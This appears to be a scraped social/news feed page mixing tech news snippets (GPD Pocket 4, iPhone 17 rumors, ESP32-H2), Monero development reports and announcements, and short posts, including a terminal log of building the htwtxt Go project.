Indiegogo recently introduced the GPD Pocket 4, a compact PC powered by AMD’s latest processors, including the Ryzen AI9 HX370. It features up to 64GB of LPDDR5x RAM, an M.2 NVMe port, Gigabit Ethernet, Wi-Fi 6E, Bluetooth 5.3, and more. Users can choose between the AMD Ryzen AI9 HX370, AI9 365, or Ryzen 7 8840U, […] ⌘ Read more
iPhone 17 Pro Already Rumored to Have These 8 New Features
While the iPhone 17 Pro and iPhone 17 Pro Max are not expected to launch for 10 more months, there are already plenty of rumors about the devices.
Below, we recap key changes rumored for the iPhone 17 Pro models so far:
- Aluminum frame: iPhone 17 Pro models are rumored to [have an aluminum frame](https://www.macrumors.com/2024/11/25/first-iphone-17- … ⌘ Read more
Monero Dev Activity Report - Week 47 2024: 20 PRs, 8 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.
Opened (14)
monero-project/monero:
Coin-sized ESP32-H2-WROOM-07 RISC-V Module with BLE, Thread, and Zigbee Support for $2.13
The ESP32-H2-WROOM-07 is a compact module featuring a RISC-V single-core 32-bit microprocessor and support for Bluetooth Low Energy. It can be configured with up to 4 MB of flash memory and is designed for applications such as smart home systems, industrial automation, and consumer electronics. Measuring just 8.5 × 12.7 × 2.6 mm, the ESP32-H2-WROOM-07 […] ⌘ Read more
Termux same thing @doesnm uses and it worked 👍  Media
      
    
    
    
    @doesnm@doesnm.p.psf.lt No it’s all good… I’ve just rebuilt it from master and it doesn’t look like anything is broken:
~/GitRepos> git clone https://github.com/plomlompom/htwtxt.git
Cloning into 'htwtxt'...
remote: Enumerating objects: 411, done.
remote: Total 411 (delta 0), reused 0 (delta 0), pack-reused 411 (from 1)
Receiving objects: 100% (411/411), 87.89 KiB | 430.00 KiB/s, done.
Resolving deltas: 100% (238/238), done.
~/GitRepos> cd htwtxt
master ~/GitRepos/htwtxt> go mod init htwtxt
go: creating new go.mod: module htwtxt
go: to add module requirements and sums:
        go mod tidy
master ~/GitRepos/htwtxt> go mod tidy
go: finding module for package github.com/gorilla/mux
go: finding module for package golang.org/x/crypto/bcrypt
go: finding module for package gopkg.in/gomail.v2
go: finding module for package golang.org/x/crypto/ssh/terminal
go: found github.com/gorilla/mux in github.com/gorilla/mux v1.8.1
go: found golang.org/x/crypto/bcrypt in golang.org/x/crypto v0.29.0
go: found golang.org/x/crypto/ssh/terminal in golang.org/x/crypto v0.29.0
go: found gopkg.in/gomail.v2 in gopkg.in/gomail.v2 v2.0.0-20160411212932-81ebce5c23df
go: finding module for package gopkg.in/alexcesaro/quotedprintable.v3
go: found gopkg.in/alexcesaro/quotedprintable.v3 in gopkg.in/alexcesaro/quotedprintable.v3 v3.0.0-20150716171945-2caba252f4dc
master ~/GitRepos/htwtxt> go build
master ~/GitRepos/htwtxt> ll
.rw-r--r-- aelaraji aelaraji 330 B  Fri Nov 22 20:25:52 2024  go.mod
.rw-r--r-- aelaraji aelaraji 1.1 KB Fri Nov 22 20:25:52 2024  go.sum
.rw-r--r-- aelaraji aelaraji 8.9 KB Fri Nov 22 20:25:06 2024  handlers.go
.rwxr-xr-x aelaraji aelaraji  12 MB Fri Nov 22 20:26:18 2024  htwtxt                 <-------- There's the binary ;)
.rw-r--r-- aelaraji aelaraji 4.2 KB Fri Nov 22 20:25:06 2024  io.go
.rw-r--r-- aelaraji aelaraji  34 KB Fri Nov 22 20:25:06 2024  LICENSE
.rw-r--r-- aelaraji aelaraji 8.5 KB Fri Nov 22 20:25:06 2024  main.go
.rw-r--r-- aelaraji aelaraji 5.5 KB Fri Nov 22 20:25:06 2024  README.md
drwxr-xr-x aelaraji aelaraji 4.0 KB Fri Nov 22 20:25:06 2024  templates
Have an Old iPhone or iPad? iCloud Backups & Safari Bookmark Syncing Will Soon Not Work
Apple is dropping support for iCloud backups for iPhone or iPad running iOS 8 or earlier. Additionally, Apple is also dropping support for Safari Bookmark Syncing for devices running iOS 10 or earlier, or macOS Sierra 10.12.5 and earlier. While this will not impact the vast majority of people, there are many older model iPhone, … [Read More](https://osxdaily … ⌘ Read more
Hey! I tried running Timeline on my server with the default PHP version (8.3) and it’s giving me a few errors https://eapl.me/timeline/ I should be sending a PR soon to fix it ;)
Hey @aelaraji@aelaraji.com I’m running PHP 8.2 on my server
Monero Dev Activity Report - Week 46 2024: 11 PRs, 9 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.
Opened (8)
monero-project/monero:
[WTS] [$1.5K USD] Encrypted Graphene OS Pixels Fully Setup
PIXEL 6, 6a, 6 Pro, 7a, 7, 7 Pro, 8a, 8 Pro
Link: https://moneromarket.io/listing/e6cd0a03-238b-434f-9a25-382e8da30725
u/Encrypto84 (MoneroMarket.io) ⌘ Read more
j-berman posts CCS progress report after 397 hours of dev work
j-berman1 has published a second progress report2 for his full-time 2024 (part 8) Monero/Seraphis dev work CCS proposal3:
Work overviewGoals for the remainder of the CCS: Enable starting to build the tree from a wallet’s arbitrary restore height, rather than require sync from genesis.
”`
- Implemented building the tree for fcmp++ in wallet2
 
- Fixed the migration code to resize the db … ⌘ Read more”`
I need to wait 30 seconds every start of mutt with 8 feeds
[ANN] MoneroTalk #330: MoneroPay, Metronero and the Monero ATM w/ Irem Kuyucu & Laurynas Cetyrkinas
Links:
- https://redirect.invidious.io/watch?v=Rq0N5zwmegg
 
- https://odysee.com/@MoneroTalk:8/
 
- https://www.monerotalk.live/monerotalk-330
 
monerotalk.live ⌘ Read more
Kewbit posts bounty for fixing ‘MoneroWHMCS’ payment gateway
Kewbit1 has posted a bounty2 for fixing the WHMCS 3 payment gateway for accepting Monero:
It’s compatibility goes up to WHMCS v7.2 however the current version is v8.9.0. It may just need bumping versions, the issue is that even once it’s enabled you can’t add a new Monero payment gateway. You would first need to understand the issue, then make it compatible with version 8.9.0 and backwards compatible if n … ⌘ Read more